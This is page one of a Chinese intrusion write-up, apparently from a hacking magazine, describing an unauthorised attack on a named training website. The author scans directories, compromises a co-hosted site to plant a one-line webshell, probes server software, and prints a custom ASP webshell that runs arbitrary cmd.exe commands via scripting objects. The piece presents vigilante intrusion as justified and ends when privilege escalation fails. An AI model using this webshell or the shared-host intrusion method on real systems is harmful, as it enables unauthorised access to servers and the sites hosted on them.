这篇文章在两个多月前的时候我就完成了，但是只是做为我自己的入侵笔记来用，并没有想过要投稿。但现在因为比较急用银子，所以就发给N0h4ck献丑了。(为了有人对号入座，我把图片稍稍处理了一下，请读者们见谅)。

　　最近在网上老是看到有人说被一个网址为“http://www.xuehk.com”的黑客培训机构骗了钱，而且骗取的金额数目可不少。于是，抱着为民除害的心态，准备对这个所谓的黑客培训机构进行一次渗透。在网上搜索了一些关于这个网站的资料，得知，这个网站在前不久已经被人黑过了，如果现在还要再次入侵的话，成功的几率可能比小，于是就叫上了几个朋友一起搞。

　　打开“http://www.xuehk.com”，发现网站的页面几乎都是静态的，如图1所示。

 　　整理好思路后，我决定先从主站入手。用阿D和明小子注入工具进行了一次注入点扫面，结果无功而返，但这是我意料之中的事。然后，我变了一下思路，花了10多分钟搜集齐了www.xuehk.com的所有目录，目录如下：

　　http://www.xuehk.com/

　　http://www.xuehk.com/book/

　　http://www.xuehk.com/vip/

　　http://www.xuehk.com/pojie/

　　http://www.xuehk.com/js/

　　http://www.xuehk.com/xz/

　　http://www.xuehk.com/zs/

　　http://www.xuehk.com/shop/

　　http://www.xuehk.com/yewu/

　　http://www.xuehk.com/zs/photo/xiao/

　　http://www.xuehk.com/zs/photo/da/

　　http://www.xuehk.com/zs/photo/

　　我分别用网站猎手和明小子注入工具的批量扫描功能对这些目录进行后台扫描，然后我又用我自己加强过的NBSI一个一个的扫，结果依然是无功而返。看来从主站入手是几乎没可能的了，于是乎开始旁注。打开“http://www.114best.com/ip/”对xuehk进行旁注查询，发现服务器上有很多网站，很快我就找到了一个有漏洞的网站，如但是由于服务器安装了比较强的杀软，所以我只拿到了一个一句话webshell，图2所示。

　　把webshell丢给朋友后，我用lake2的一句话木马客户端查看了一下服务器信息，webshell所在的网站根目录为“F:\wwwroot\****\wwwroot\”，****为网站域名的前段，所以，我推测xuehk.com的网站根目录为“F:\wwwroot\xuehk\wwwroot\”，于是我马上尝试跳转到此目录，但是没有权限。这时我想到asp.net的木马权限可能会比asp的高一点，但是上传好lake2的asp.net一句话木马后却发现服务器不支持asp.net。

　　接着查看了一下终端信息，发现端口被改为了60015。查看了一下第三方软件的信息，结果serv-u路径找不到，而且默认密码改了，服务器上没有安装PcanyWhere和Radmin，MSSQL和Mysql也没有安装，仔细再找了一下，也没有发现什么可利用的第三方软件，而且服务器的权限设置得很死，连“开始→程序”都打不开。

　　上传cmd.asp准备尝试执行命令，但cmd.asp也被服务器的杀毒软件给kill了，于是，自己操刀写了个执行cmd命令的asp脚本，代码如下：

<object runat=server id=oScriptlhn scope=page classid="clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8"></object> <%if err then%> <object runat=server id=oScriptlhn scope=page classid="clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B"></object> <% end if response.write("<textarea readonly cols=80 rows=20>") On Error Resume Next response.write oScriptlhn.exec("cmd.exe /c" & request("c")).stdout.readall response.write("</textarea>") response.write("<form method='post'>") response.write("<input type=text name='c' size=60><br>") response.write("<input type=submit value='执行'></form>") %>

　　成功上传到服务器后，执行cmd.asp命令失败。我想可能是管理员删除了cmd.exe，也可能是服务器的权限设置问题，用一句话木马查看服务器服务信息发现Wscript并没有被禁止，本想用Wscript来执行命令，但是连一些能写的目录都找不到，常用的everyone目录都不能用，至此，提权陷入了死局。感觉没什么意思，就跟朋友说了下情况出去玩了。

[1] [2] 下一页